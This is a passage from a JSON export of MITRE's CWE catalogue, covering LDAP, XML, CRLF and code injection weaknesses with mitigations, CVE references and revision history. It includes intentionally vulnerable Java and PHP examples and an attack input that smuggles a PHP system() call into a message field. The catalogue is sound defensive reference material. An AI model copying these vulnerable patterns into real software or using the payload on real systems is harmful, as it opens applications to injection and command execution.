Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"SQL Injection","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Data into SQL Queries (aka \'SQL Injection\')","attr":{"@_Date":"2008-09-09"}},{"#text":"Failure to Sanitize Data within SQL Queries (aka \'SQL Injection\')","attr":{"@_Date":"2009-01-12"}},{"#text":"Failure to Preserve SQL Query Structure (aka \'SQL Injection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Preserve SQL Query Structure (\'SQL Injection\')","attr":{"@_Date":"2009-07-27"}},{"#text":"Improper Sanitization of Special Elements used in an SQL Command (\'SQL Injection\')","attr":{"@_Date":"2010-06-21"}}]}},"90":{"attr":{"@_ID":"90","@_Name":"Improper Neutralization of Special Elements used in an LDAP Query (\'LDAP Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software constructs all or part of an LDAP query using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended LDAP query when it is sent to a downstream component.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"943","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Database Server","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Execute Unauthorized Code or Commands","Read Application Data","Modify Application Data"],"Note":"An attacker could include input that changes the LDAP query which allows unintended commands or code to be executed, allows sensitive data to be read or modified or causes other unintended behavior."}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The code below constructs an LDAP query using user input address data:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"context = new InitialDirContext(env);String searchFilter = \\"StreetAddress=\\" + address;NamingEnumeration answer = context.search(searchBase, searchFilter, searchCtls);","xhtml:br":["",""]}},"Body_Text":"Because the code fails to neutralize the address string used to construct the query, an attacker can supply an address that includes additional LDAP queries."}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2005-2301","Description":"Server does not properly escape LDAP queries, which allows remote attackers to cause a DoS and possibly conduct an LDAP injection attack.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2301"}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"LDAP injection"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A2","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":29,"Entry_Name":"LDAP Injection"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"136"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-879"}}},"Notes":{"Note":[{"#text":"Factors: resultant to special character mismanagement, MAID, or denylist/allowlist problems. Can be primary to authentication and verification errors.","attr":{"@_Type":"Relationship"}},{"#text":"Under-reported. This is likely found very frequently by third party code auditors, but there are very few publicly reported examples.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Demonstrative_Examples, Description, Name, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Observed_Examples, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"LDAP Injection","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Data into LDAP Queries (aka \'LDAP Injection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Sanitize Data into LDAP Queries (\'LDAP Injection\')","attr":{"@_Date":"2010-06-21"}}]}},"91":{"attr":{"@_ID":"91","@_Name":"XML Injection (aka Blind XPath Injection)","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly neutralize special elements that are used in XML, allowing attackers to modify the syntax, content, or commands of the XML before it is processed by an end system.","Extended_Description":"Within XML, special elements could include reserved words or characters such as \\"&lt;\\", \\"&gt;\\", \\"\\"\\", and \\"&amp;\\", which could then be used to add new data or modify XML syntax.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":["Execute Unauthorized Code or Commands","Read Application Data","Modify Application Data"]}},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"XML injection (aka Blind Xpath injection)"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A2","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A6","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":23,"Entry_Name":"XML Injection"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"250"}},{"attr":{"@_CAPEC_ID":"83"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-882"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 17, &#34;XML Injection&#34;, Page 1069"}}]},"Notes":{"Note":[{"#text":"The description for this entry is generally applicable to XML, but the name includes \\"blind XPath injection\\" which is more closely associated with CWE-643. Therefore this entry might need to be deprecated or converted to a general category - although injection into raw XML is not covered by CWE-643 or CWE-652.","attr":{"@_Type":"Maintenance"}},{"#text":"In vulnerability theory terms, this is a representation-specific case of a Data/Directive Boundary Error.","attr":{"@_Type":"Theoretical"}},{"#text":"Under-reported. This is likely found regularly by third party code auditors, but there are very few publicly reported examples.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Maintenance_Notes, Other_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"92":{"attr":{"@_ID":"92","@_Name":"DEPRECATED: Improper Sanitization of Custom Special Characters","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Deprecated"},"Description":"This entry has been deprecated. It originally came from PLOVER, which sometimes defined \\"other\\" and \\"miscellaneous\\" categories in order to satisfy exhaustiveness requirements for taxonomies. Within the context of CWE, the use of a more abstract entry is preferred in mapping situations. CWE-75 is a more appropriate mapping.","Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Maintenance_Notes, Name, Observed_Examples, Potential_Mitigations, Related_Attack_Patterns, Relationship_Notes, Relationships, Research_Gaps, Taxonomy_Mappings, Time_of_Introduction, Type, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Maintenance_Notes"}],"Previous_Entry_Name":[{"#text":"Custom Special Character Injection","attr":{"@_Date":"2008-10-14"}},{"#text":"Insufficient Sanitization of Custom Special Characters","attr":{"@_Date":"2009-05-27"}},{"#text":"Improper Sanitization of Custom Special Characters","attr":{"@_Date":"2009-07-27"}}]}},"93":{"attr":{"@_ID":"93","@_Name":"Improper Neutralization of CRLF Sequences (\'CRLF Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses CRLF (carriage return line feeds) as a special element, e.g. to separate lines or records, but it does not neutralize or incorrectly neutralizes CRLF sequences from inputs.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"117","@_View_ID":"1000"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Application Data"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Avoid using CRLF as a special sequence."},{"Phase":"Implementation","Description":"Appropriately filter or quote CRLF sequences in user-controlled input."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"If user input data that eventually makes it to a log message isn\'t checked for CRLF characters, it may be possible for an attacker to forge entries in a log file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":"logger.info(\\"User\'s street address: \\" + request.getParameter(\\"streetAddress\\"));"}}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2002-1771","Description":"CRLF injection enables spam proxy (add mail headers) using email address or name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1771"},{"Reference":"CVE-2002-1783","Description":"CRLF injection in API function arguments modify headers for outgoing requests.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1783"},{"Reference":"CVE-2004-1513","Description":"Spoofed entries in web server log file via carriage returns","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1513"},{"Reference":"CVE-2006-4624","Description":"Chain: inject fake log entries with fake timestamps using CRLF injection","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4624"},{"Reference":"CVE-2005-1951","Description":"Chain: Application accepts CRLF in an object ID, allowing HTTP response splitting.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1951"},{"Reference":"CVE-2004-1687","Description":"Chain: HTTP response splitting via CRLF in parameter related to URL.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1687"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"CRLF Injection"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A2","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":24,"Entry_Name":"HTTP Request Splitting"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"15"}},{"attr":{"@_CAPEC_ID":"81"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-928"}}},"Notes":{"Note":{"#text":"Probably under-studied, although gaining more prominence in 2005 as a result of interest in HTTP response splitting.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Likelihood_of_Exploit"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Related_Attack_Patterns, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"CRLF Injection","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize CRLF Sequences (aka \'CRLF Injection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Sanitize CRLF Sequences (\'CRLF Injection\')","attr":{"@_Date":"2010-06-21"}}]}},"94":{"attr":{"@_ID":"94","@_Name":"Improper Control of Generation of Code (\'Code Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.","Extended_Description":{"xhtml:p":["When software allows a user\'s input to contain code syntax, it might be possible for an attacker to craft the code in such a way that it will alter the intended control flow of the software. Such an alteration could lead to arbitrary code execution.","Injection problems encompass a wide variety of issues -- all mitigated in very different ways. For this reason, the most effective way to discuss these weaknesses is to note the distinct features which classify them as injection weaknesses. The most important issue to note is that all injection problems share one thing in common -- i.e., they allow for the injection of control plane data into the user-controlled data plane. This means that the execution of the process may be altered by sending code in through legitimate data channels, using no other mechanism. While buffer overflows, and many other flaws, involve the use of some further issue to gain execution, injection problems need only for the data to be parsed. The most classic instantiations of this category of weakness are SQL injection and format string vulnerabilities."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"913","@_View_ID":"1000"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Interpreted","@_Prevalence":"Sometimes"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"In some cases, injectable code controls authentication; this may lead to a remote vulnerability."},{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity","Note":"Injected code can access resources that the attacker is directly prevented from accessing."},{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"Code injection attacks can lead to loss of data integrity in nearly all cases as the control-plane data injected is always incidental to data recall or writing. Additionally, code injection can often result in the execution of arbitrary code."},{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"Often the actions performed by injected control code are unlogged."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Refactor your program so that you do not have to dynamically generate code."},{"Phase":"Architecture and Design","Description":{"xhtml:p":["Run your code in a \\"jail\\" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your software.","Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection.","This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise.","Be careful to avoid CWE-243 and other weaknesses related to jails."]}},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","To reduce the likelihood of code injection, use stringent allowlists that limit which constructs are allowed. If you are dynamically constructing code that invokes a function, then verifying that the input is alphanumeric might be insufficient. An attacker might still be able to reference a dangerous function that you did not intend to allow, such as system(), exec(), or exit()."]}},{"Phase":"Testing","Description":"Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible."},{"Phase":"Testing","Description":"Use dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."},{"attr":{"@_Mitigation_ID":"MIT-32"},"Phase":"Operation","Strategy":"Compilation or Build Hardening","Description":"Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl\'s \\"-T\\" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184)."},{"attr":{"@_Mitigation_ID":"MIT-32"},"Phase":"Operation","Strategy":"Environment Hardening","Description":"Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl\'s \\"-T\\" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184)."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-32"},"Intro_Text":"This example attempts to write user messages to a message file and allow users to view them.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$MessageFile = \\"messages.out\\";if ($_GET[\\"action\\"] == \\"NewMessage\\") {}else if ($_GET[\\"action\\"] == \\"ViewMessages\\") {}","xhtml:br":["",""],"xhtml:div":[{"#text":"$name = $_GET[\\"name\\"];$message = $_GET[\\"message\\"];$handle = fopen($MessageFile, \\"a+\\");fwrite($handle, \\"&lt;b&gt;$name&lt;/b&gt; says \'$message\'&lt;hr&gt;\\\\n\\");fclose($handle);echo \\"Message Saved!&lt;p&gt;\\\\n\\";","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","",""]},{"#text":"include($MessageFile);","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"name=h4x0rmessage=%3C?php%20system(%22/bin/ls%20-l%22);?%3E","xhtml:br":""}},{"attr":{"@_Nature":"attack"},"xhtml:div":"&lt;?php system(\\"/bin/ls -l\\");?&gt;"}],"Body_Text":["While the programmer intends for the MessageFile to only include data, an attacker can provide a message such as:","which will decode to the following:","The programmer thought they were just including the contents of a regular data file, but PHP parsed it and executed the code. Now, this code is executed any time people view messages.","Notice that XSS (CWE-79) is also possible in this 